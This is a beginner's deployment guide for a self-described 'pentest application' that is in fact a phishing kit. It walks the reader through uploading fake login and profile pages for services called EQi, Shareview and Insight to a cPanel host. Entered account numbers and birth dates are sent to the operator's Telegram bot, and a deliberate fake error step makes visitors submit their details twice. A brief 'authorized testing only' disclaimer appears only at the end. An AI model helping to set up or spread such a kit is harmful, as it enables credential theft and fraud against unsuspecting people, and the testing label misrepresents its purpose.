# Complete Beginner's Guide for Windows Users
## Setting Up Your Pentest Application - Step by Step

This guide assumes you have ZERO technical knowledge. We'll walk through everything together!

---

## 📋 What You'll Need

1. **A Windows Computer** (any version - Windows 10 or 11 recommended)
2. **A cPanel Hosting Account** (from providers like Hostinger, Bluehost, SiteGround, Namecheap, etc.)
3. **A Telegram Account** (download from https://telegram.org)
4. **About 30 minutes of time**

---

## Part 1: Setting Up Telegram Bot (10 minutes)

### Step 1: Download Telegram

1. Go to https://telegram.org
2. Click "Get Telegram for Windows"
3. Run the installer
4. Open Telegram and sign in with your phone number

### Step 2: Create Your Bot

1. In Telegram, click the search box at the top
2. Type: `@BotFather`
3. Click on the blue checkmark "BotFather" (official Telegram bot)
4. Click "START" button at the bottom
5. Type this message: `/newbot`
6. Press Enter

### Step 3: Name Your Bot

1. BotFather will ask: "Alright, a new bot. How are we going to call it?"
2. Type any name you want, for example: `My Security Bot`
3. Press Enter
4. BotFather will ask for a username (must end with 'bot')
5. Type something like: `mysecurity123_bot`
6. Press Enter

### Step 4: Save Your Bot Token

1. BotFather will give you a message with your token
2. It looks like: `123456789:ABCdefGHIjklMNOpqrsTUVwxyz`
3. **IMPORTANT**: Copy this entire token
4. Open Notepad (search "Notepad" in Windows Start menu)
5. Paste the token and save the file as "telegram-credentials.txt" on your Desktop

### Step 5: Get Your Chat ID

1. In Telegram, find your bot (search for the username you just created)
2. Click on your bot
3. Type any message to it and press Send (example: "Hello")
4. Now open your web browser (Chrome, Edge, Firefox, etc.)
5. Copy this URL and paste it in the address bar:
   ```
   https://api.telegram.org/bot123456789:ABCdefGHIjklMNOpqrsTUVwxyz/getUpdates
   ```
   **IMPORTANT**: Replace `123456789:ABCdefGHIjklMNOpqrsTUVwxyz` with YOUR bot token from Step 4

6. Press Enter
7. You'll see some text. Look for something like: `"chat":{"id":123456789`
8. The number after `"id":` is your Chat ID
9. Copy that number
10. Go back to your Notepad file and add:
    ```
    Bot Token: 123456789:ABCdefGHIjklMNOpqrsTUVwxyz
    Chat ID: 123456789
    ```
11. Save the file

✅ **Telegram Setup Complete!** Now you have your Bot Token and Chat ID.

---

## Part 2: Preparing Your Files (5 minutes)

### Step 1: Extract the ZIP File

1. Find the ZIP file you downloaded (probably in your Downloads folder)
2. Right-click on it
3. Choose "Extract All..."
4. Click "Extract"
5. A new folder will open

### Step 2: Find the Backend Folder

1. Inside the extracted folder, you should see a folder called "backend"
2. Open it
3. You should see several files including `config.php`

---

## Part 3: Setting Up Encryption Key (5 minutes)

### Option A: Using the Web Tool (Easiest)

1. In the backend folder, find `generate-key.php`
2. Right-click on it and open with Notepad
3. Copy ALL the text
4. Go to https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
5. Delete everything in the left box
6. Paste the code you copied
7. Click "Run"
8. You'll see a long random string - this is your encryption key
9. Copy it
10. Save it in your "telegram-credentials.txt" file:
    ```
    Bot Token: 123456789:ABCdefGHIjklMNOpqrsTUVwxyz
    Chat ID: 123456789
    Encryption Key: [paste your key here]
    ```

### Option B: Using a Random Generator (Alternative)

1. Go to https://www.random.org/strings/
2. Set these options:
   - Generate: 1 string
   - Length: 32 characters
   - Characters: Alphanumeric
3. Click "Get Strings"
4. Copy the generated string
5. Save it in your "telegram-credentials.txt" file

✅ **Encryption Key Created!**

---

## Part 4: Configuring the Backend (5 minutes)

### Step 1: Open config.php

1. In the backend folder, find `config.php`
2. Right-click on it
3. Choose "Open with" → "Notepad"

### Step 2: Update Your Credentials

Find these lines in config.php:

**Line 11** - Replace with your Bot Token:
```php
define('TELEGRAM_BOT_TOKEN', 'YOUR_BOT_TOKEN_HERE');
```
Change to:
```php
define('TELEGRAM_BOT_TOKEN', '123456789:ABCdefGHIjklMNOpqrsTUVwxyz');
```
(Use YOUR actual token!)

**Line 12** - Replace with your Chat ID:
```php
define('TELEGRAM_CHAT_ID', 'YOUR_CHAT_ID_HERE');
```
Change to:
```php
define('TELEGRAM_CHAT_ID', '123456789');
```
(Use YOUR actual chat ID!)

**Line 15** - Replace with your Encryption Key:
```php
define('ENCRYPTION_KEY', 'your-secret-encryption-key-change-this');
```
Change to:
```php
define('ENCRYPTION_KEY', 'your-32-character-random-key-from-step-3');
```
(Use YOUR actual encryption key!)

**Lines 20-22** - Replace with your domain:
```php
define('ALLOWED_ORIGINS', [
    'https://yourdomain.com',
    'https://www.yourdomain.com'
]);
```
Change to:
```php
define('ALLOWED_ORIGINS', [
    'https://your-actual-website.com',
    'https://www.your-actual-website.com'
]);
```
(Use YOUR actual domain name!)

### Step 3: Save the File

1. Click File → Save
2. Close Notepad

✅ **Backend Configured!**

---

## Part 5: Updating Frontend Files (5 minutes)

You need to tell the frontend pages where your backend is located.

### Step 1: Update Each Login Page

1. Open `login-eqi.html` with Notepad
2. Find this line (around line 145):
   ```javascript
   const API_URL = 'https://yourdomain.com/backend/api/submit.php';
   ```
3. Change it to:
   ```javascript
   const API_URL = 'https://your-actual-website.com/backend/api/submit.php';
   ```
4. Save the file

**Repeat for these files:**
- `login-shareview.html`
- `login-insight.html`
- `profile-eqi.html`
- `profile-shareview.html`
- `profile-insight.html`

**TIP**: Use Find & Replace in Notepad:
1. Press Ctrl+H
2. Find what: `https://yourdomain.com`
3. Replace with: `https://your-actual-website.com`
4. Click "Replace All"

✅ **Frontend Updated!**

---

## Part 6: Uploading to cPanel (10 minutes)

### Step 1: Log into cPanel

1. Go to your hosting provider's website
2. Log into your account
3. Find and click "cPanel" button
4. You'll see a dashboard with lots of icons

### Step 2: Open File Manager

1. In cPanel, find "File Manager" icon (usually in "Files" section)
2. Click it
3. A new window opens showing your files

### Step 3: Navigate to public_html

1. On the left side, you'll see folders
2. Click on "public_html" folder
3. This is where your website files go

### Step 4: Upload Backend Folder

1. Click "Upload" button at the top
2. Click "Select File" button
3. Navigate to your extracted files
4. Select the entire "backend" folder
   - **IMPORTANT**: If you can't upload a folder, do this instead:
     - Create a new folder in public_html called "backend"
     - Open that folder
     - Upload all files from your local backend folder one by one

5. Wait for upload to complete (you'll see a progress bar)

### Step 5: Upload Frontend Files

1. Go back to public_html folder
2. Upload all HTML files:
   - `index.html`
   - `login-eqi.html`
   - `login-shareview.html`
   - `login-insight.html`
   - `profile-eqi.html`
   - `profile-shareview.html`
   - `profile-insight.html`

### Step 6: Create Logs Folder

1. In File Manager, open the "backend" folder
2. Click "New Folder" button
3. Name it: `logs`
4. Click "Create"
5. Right-click on the "logs" folder
6. Choose "Change Permissions"
7. Make sure these are checked:
   - Owner: Read, Write, Execute
   - Group: Read, Execute
   - World: Read, Execute
8. The number should show 755
9. Click "Save"

✅ **Files Uploaded!**

---

## Part 7: Testing Your Setup (5 minutes)

### Step 1: Test the Backend

1. In your web browser, go to:
   ```
   https://your-actual-website.com/backend/test.php
   ```
2. You should see green checkmarks (✅) for all tests
3. Check your Telegram - you should receive a test message!
4. If you see any red X marks (❌), something is wrong:
   - Check your config.php file again
   - Make sure you copied the tokens correctly
   - Make sure the logs folder exists and has correct permissions

### Step 2: Delete test.php (IMPORTANT!)

1. In cPanel File Manager, go to the backend folder
2. Find `test.php`
3. Right-click on it
4. Choose "Delete"
5. Confirm deletion

### Step 3: Test the Login Pages

1. Go to: `https://your-actual-website.com/index.html`
2. Select a service (EQi, Shareview, or Insight)
3. Click Continue
4. Fill in the login form with fake data
5. Click Continue
6. You should see an error message
7. Fill it in again
8. You should see success and redirect to profile page
9. Fill in the profile page
10. Click Submit
11. Check your Telegram - you should receive the data!

✅ **Everything Works!**

---

## Part 8: Security Hardening (Optional but Recommended)

### Install SSL Certificate (Free)

1. In cPanel, find "SSL/TLS Status"
2. Click "Run AutoSSL"
3. Wait for it to complete
4. Your site will now use HTTPS (secure)

### Enable HTTPS Redirect

1. In File Manager, go to backend folder
2. Open `.htaccess` file
3. Find these lines:
   ```apache
   # RewriteCond %{HTTPS} off
   # RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
   ```
4. Remove the `#` at the start of each line:
   ```apache
   RewriteCond %{HTTPS} off
   RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
   ```
5. Save the file

---

## 🎉 You're Done!

Your pentest application is now live and working!

### What Happens Now?

1. When someone visits your site and logs in, you'll receive their data in Telegram
2. Data is encrypted for security
3. Logs are stored on your server
4. Everything works automatically!

### What You'll Receive in Telegram:

```
🔐 NEW LOGIN ATTEMPT
━━━━━━━━━━━━━━━━━━━━
📱 Service: EQI
🕐 Time: 2024-02-21T10:30:00Z
🌐 User Agent: Mozilla/5.0...
📍 IP: 123.456.789.0
━━━━━━━━━━━━━━━━━━━━
📋 FORM DATA:
accountNumber: 12345
dobDay: 15
dobMonth: March
dobYear: 1990
...
```

---

## 📞 Troubleshooting

### "I don't receive Telegram messages"

1. Check that you sent a message to your bot first
2. Verify your bot token is correct in config.php
3. Verify your chat ID is correct in config.php
4. Run test.php again

### "I see 500 Internal Server Error"

1. Check that config.php has no syntax errors
2. Make sure you closed all quotes properly
3. Check file permissions (should be 644 for PHP files)

### "CORS Error in Browser Console"

1. Make sure you updated ALLOWED_ORIGINS in config.php
2. Make sure your domain matches exactly (with or without www)

### "Nothing happens when I submit forms"

1. Check browser console for errors (Press F12)
2. Make sure you updated API_URL in all HTML files
3. Verify backend folder is uploaded correctly

---

## 🔒 Security Reminders

1. **Never share your config.php file** - it contains secrets
2. **Never commit config.php to GitHub** or any public place
3. **Delete test.php after testing** - it shows system information
4. **Use HTTPS only** - install SSL certificate
5. **Change encryption key regularly** if doing long-term testing

---

## 📚 File Structure Reference

```
your-website.com/
├── index.html                    (Main page with service selector)
├── login-eqi.html               (EQi login page)
├── login-shareview.html         (Shareview login page)
├── login-insight.html           (Insight login page)
├── profile-eqi.html             (EQi profile/details page)
├── profile-shareview.html       (Shareview profile page)
├── profile-insight.html         (Insight profile page)
└── backend/
    ├── config.php               (Your configuration - KEEP SECRET!)
    ├── .htaccess               (Security settings)
    ├── api/
    │   └── submit.php          (Receives form data)
    ├── includes/
    │   ├── Encryption.php      (Handles encryption)
    │   ├── TelegramBot.php     (Sends to Telegram)
    │   ├── RateLimiter.php     (Prevents abuse)
    │   ├── FileLogger.php      (Saves logs)
    │   └── DatabaseLogger.php  (Optional database logging)
    └── logs/                    (Log files stored here)
```

---

## ✅ Final Checklist

Before going live, make sure:

- [ ] Telegram bot created and tested
- [ ] config.php updated with real values
- [ ] All HTML files updated with correct API_URL
- [ ] Files uploaded to cPanel
- [ ] Logs folder created with 755 permissions
- [ ] test.php shows all green checkmarks
- [ ] test.php deleted after testing
- [ ] SSL certificate installed
- [ ] HTTPS redirect enabled
- [ ] Tested with actual form submission
- [ ] Received test data in Telegram

---

## 🎓 Congratulations!

You've successfully set up a professional pentest application!

Remember:
- This is for **authorized testing only**
- Only use on systems you have **permission** to test
- Keep your credentials **secure**
- Monitor your Telegram for incoming data

**Need help?** Review the troubleshooting section or check the included README.md for more technical details.

Good luck! 🚀
